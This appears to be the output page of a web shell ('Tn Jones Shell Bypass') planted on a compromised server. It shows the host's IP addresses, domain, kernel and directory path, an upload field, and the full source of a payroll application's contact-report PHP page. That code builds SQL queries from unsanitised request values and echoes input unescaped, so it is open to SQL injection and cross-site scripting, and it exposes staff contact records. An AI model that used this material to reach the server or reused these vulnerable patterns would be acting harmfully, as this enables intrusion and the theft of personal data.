Tn Jones Shell Bypass
:
3.137.164.200
:
160.187.54.56 / upgov.net
:
Linux 160-187-54-56.cprapid.com 4.18.0-553.22.1.lve.1.el7h.x86_64 #1 SMP Tue Oct 8 14:36:03 UTC 2024 x86_64
:
/
home
/
upgov
/
www
/
rmpyrll
/
Upload File:
files >> /home/upgov/www/rmpyrll/contact_report.php
<?php date_default_timezone_set("Asia/Kolkata"); ?> <?php include("connection.php"); session_start(); if (!isset($_SESSION['user']) || ($_SESSION['password'] == '')) { header("location:payrolLogin/ramalogin.php"); exit(); } if(isset($_SESSION['user'])) { $username=$_SESSION['user']; } $user_query = mysql_query("SELECT * FROM loginrama where user='$username' ")or die(mysql_error()); $user_row = mysql_fetch_array($user_query); $us = $user_row['user']; ?> <!DOCTYPE html> <html> <head> <title>Payroll</title> <link href="css/bootstrap.css" rel='stylesheet' type='text/css'/> <!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> <script src="js/jquery.min.js"></script> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="keywords" content="Payroll Responsive web template, Bootstrap Web Templates, Flat Web Templates, Andriod Compatible web template, Smartphone Compatible web template, free webdesigns for Nokia, Samsung, LG, SonyErricsson, Motorola web design" /> <script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false); function hideURLbar(){ window.scrollTo(0,1); } </script> <link rel="stylesheet" href="css/flexslider.css" type="text/css" media="screen" /> <link href="css/style.css" rel="stylesheet" type="text/css" media="all" /> <!---- start-smoth-scrolling----> <script type="text/javascript" src="js/move-top.js"></script> <script type="text/javascript" src="js/easing.js"></script> <script src="js/jquery.easydropdown.js"></script> <script src="js/cbpViewModeSwitch.js" type="text/javascript"></script> </head> <body> <div class="header"> <div class="container"> <div class="logo"> <a href="index.html"><img src="images/logo.png" alt=""/></a> </div> <div class="top-menu"> <span class="menu"> </span> </div> <div id="sb-search" class="sb-search"> <h4 align="right"><a href="logout.php"><img src="images/logout.jpg"></a></h4> </div> <!-- search-scripts --> <script src="js/classie.js"></script> <script src="js/uisearch.js"></script> <!-- //search-scripts --> <div class="clearfix"></div> </div> <div class="clearfix"></div> </div> <!-- header-section-ends --> <div class="content"> <div class="good-design"> <h3>Contact Detail</h3> <form name="frm_image" method="post"> <?php $w=$_REQUEST["t1"]; $w2=$_REQUEST["t2"]; $w3=$_REQUEST["t3"]; ?> <center> <table> <td><font color="black"><b>Select Scheme</b></font><br><select name="t1" style="height:32px;width:250px;"> <option style="font-weight: bold;background-color:gray;color:white;" value="<?php echo $w; ?>"><strong><?php echo $w; ?></strong></option> <?php $sql=mysql_query("select distinct scheme from login order by scheme")or die(""); while($r = mysql_fetch_array($sql)) { ?> <option value="<?php echo $r['scheme'];?>"><?php echo $r['scheme'];?></option> <?php } ?> </select> </td> <td><font color="black"><b>Select District</b></font><br> <select name="t3" style="height:32px;width:250px;"> <option style="font-weight: bold;background-color:gray;color:white;" value="<?php echo $w3; ?>"><b><?php echo $w3; ?></b></option> <?php $sql=mysql_query("select distinct district from login order by district")or die(""); while($r = mysql_fetch_array($sql)) { ?> <option value="<?php echo $r['district'];?>"><?php echo $r['district'];?></option> <?php } ?> </select> </td> <td> <br><input type="submit" value="Search" style="font-weight:bold;height:30px;width:80px;background:#224B73;color:#FFF;" /></td> <td> <br><input type="button" value="Reset" style="font-weight:bold;height:30px;width:80px;background:#224B73;color:#FFF;" onClick="window.location.href=window.location.href"/></td> <td> <br><a href="page2.php"><input type="button" value="Back" style="text-align:center;font-weight:bold;height:30px;width:80px;background:#224B73;color:#FFF;" /></a></td> </center></table> <br> <br> <br> <table width="98%" border="2" align="center" style="position:relative;top:-20px;border-color: #224B73;" class='table-responsive' cellspacing='2px' cellpadding='2px'> <tr style="background-color:#224B73;color:#FFFFFF;font-size:14px"> <td width="20px" height="45px" align="center" style="border-color:white;"> <font size="3">S.No</font> </td> <td width="20px" height="45px" align="center" style="border-color:white;"> <font size="3">Update</font> </td> <td width="100px" height="45px" align="center" style="border-color:white;"><font size="3"> Scheme </font></td> <td width="100px" height="45px" align="center" style="border-color:white;"><font size="3"> District </font></td> <td width="100px" height="45px" align="center" style="border-color:white;"><font size="3"> Sub Location </font></td> <td width="100px" height="45px" align="center" style="border-color:white;"><font size="3"> Opreator Postname </font></td> <td width="100px" height="45px" align="center" style="border-color:white;"><font size="3"> Opreator Name </font></td> <td width="100px" height="45px" align="center" style="border-color:white;"><font size="3"> Opreator Mobile no </font></td> <td width="100px" height="45px" align="center" style="border-color:white;"><font size="3"> Opreator Mobile no 2 </font></td> <td width="100px" height="45px" align="center" style="border-color:white;"><font size="3"> Opreator Email Id </font></td> <td width="100px" height="45px" align="center" style="border-color:white;"><font size="3"> Clerk Postname </font></td> <td width="100px" height="45px" align="center" style="border-color:white;"><font size="3"> Clerk Name </font></td> <td width="100px" height="45px" align="center" style="border-color:white;"><font size="3"> Clerk Mobile no </font></td> <td width="100px" height="45px" align="center" style="border-color:white;"><font size="3"> Clerk Mobile no 2 </font></td> <td width="100px" height="45px" align="center" style="border-color:white;"><font size="3"> Clerk Email Id </font></td> <td width="100px" height="45px" align="center" style="border-color:white;"><font size="3"> DD/CMS postname </font></td> <td width="100px" height="45px" align="center" style="border-color:white;"><font size="3"> DD/CMS Name </font></td> <td width="100px" height="45px" align="center" style="border-color:white;"><font size="3"> DD/CMS Mobile no </font></td> <td width="100px" height="45px" align="center" style="border-color:white;"><font size="3"> DD/CMS Mobile no 2 </font></td> <td width="100px" height="45px" align="center" style="border-color:white;"><font size="3"> DD/CMS Email Id </font></td> </tr> <?php include('connection.php'); $field='department'; $sort='DESC'; if(isset($_GET['sorting'])) { if($_GET['sorting']=='DESC') { $sort='ASC'; } else { $sort='DESC'; } } if($_GET['field']=='department') { $field = "department"; } elseif($_GET['field']=='scheme') { $field = "scheme"; } elseif($_GET['field']=='district') { $field="district"; } elseif($_GET['field']=='month') { $field="month"; } elseif($_GET['field']=='payformdate') { $field="payformdate"; } elseif($_GET['field']=='salformdate') { $field="salformdate"; } $sql=mysql_query("SELECT * FROM login where scheme like '$w%' AND district like '$w3%' ORDER BY scheme DESC ,division ASC"); $count1=0; for($i=0;$r=mysql_fetch_assoc($sql);$i++) { $count1=$i+1; ?> <tr style="color:black;font-size:11px; font-family:Andalus" > <td align="center" height="45px"> <font size="3" height="45px"><?php echo $count1;?></font> </td> <td align='center' height="45px"><font size='3'><b><a href="contact_update.php?dept1=<?php echo $r['department'];?>&sche1=<?php echo $r['scheme'];?>&host1=<?php echo $r['sub_select'];?>&dist1=<?php echo $r['district'];?>"><img src="images/update.jpg" /></a></b></font></td> <td align="center" height="45px"> <font size="3"><?php echo $r['scheme'];?></font> </td> <td align="center" height="45px"> <font size="3"><?php echo $r['district'];?></font> </td> <td align="center" height="45px"> <font size="3"><?php echo $r['sub_select'];?></font> </td> <td align="center" height="45px"> <font size="3"><?php echo $r['Op_postname']; ?></font> </td> <td align="center" height="45px"> <font size="3"><?php echo $r['Op_name'];?></font> </td> <td align="center" height="45px"> <font size="3"><?php echo $r['Mobileno'];?></font> </td> <td align="center" height="45px"> <font size="3"><?php echo $r['mobileno2']; ?></font> </td> <td align="center" height="45px"> <font size="3"><?php echo $r['Email'];?></font> </td> <td align="center" height="45px"> <font size="3"><?php echo $r['clerk_postname'];?></font> </td> <td align="center" height="45px"> <font size="3"><?php echo $r['clerk_name'];?></font> </td> <td align="center" height="45px"> <font size="3"><?php echo $r['clerk_mobile1']; ?></font> </td> <td align="center" height="45px"> <font size="3"><?php echo $r['clerk_mobile2']; ?></font> </td> <td align="center" height="45px"> <font size="3"><?php echo $r['clerk_Email']; ?></font> </td> <td align="center" height="45px"> <font size="3"><?php echo $r['DD_postname'];?></font> </td> <td align="center" height="45px"> <font size="3"><?php echo $r['DD_name'];?></font> </td> <td align="center" height="45px"> <font size="3"><?php echo $r['DD_mobile1']; ?></font> </td> <td align="center" height="45px"> <font size="3"><?php echo $r['DD_mobile2']; ?></font> </td> <td align="center" height="45px"> <font size="3"><?php echo $r['DD_Email']; ?></font> </td> </tr> <?php }?> </table> </form> </div> <div class="footer"> <div class="container"> <div class="clearfix"></div> <div class="footer-bottom"> <p>© 2016 | Design by<a href="http://ramaipl.com/"> Rama Infotech Pvt Ltd</a> || For Updated View Press Ctrl+F5 </p> </div> <script type="text/javascript"> $(document).ready(function() { /* var defaults = { containerID: 'toTop', // fading element id containerHoverID: 'toTopHover', // fading element hover id scrollSpeed: 1200, easingType: 'linear' }; */ $().UItoTop({ easingType: 'easeOutQuart' }); }); </script> <a href="#" id="toTop" style="display: block;"> <span id="toTopHover" style="opacity: 1;"> </span></a> </div> </div> </body> </html>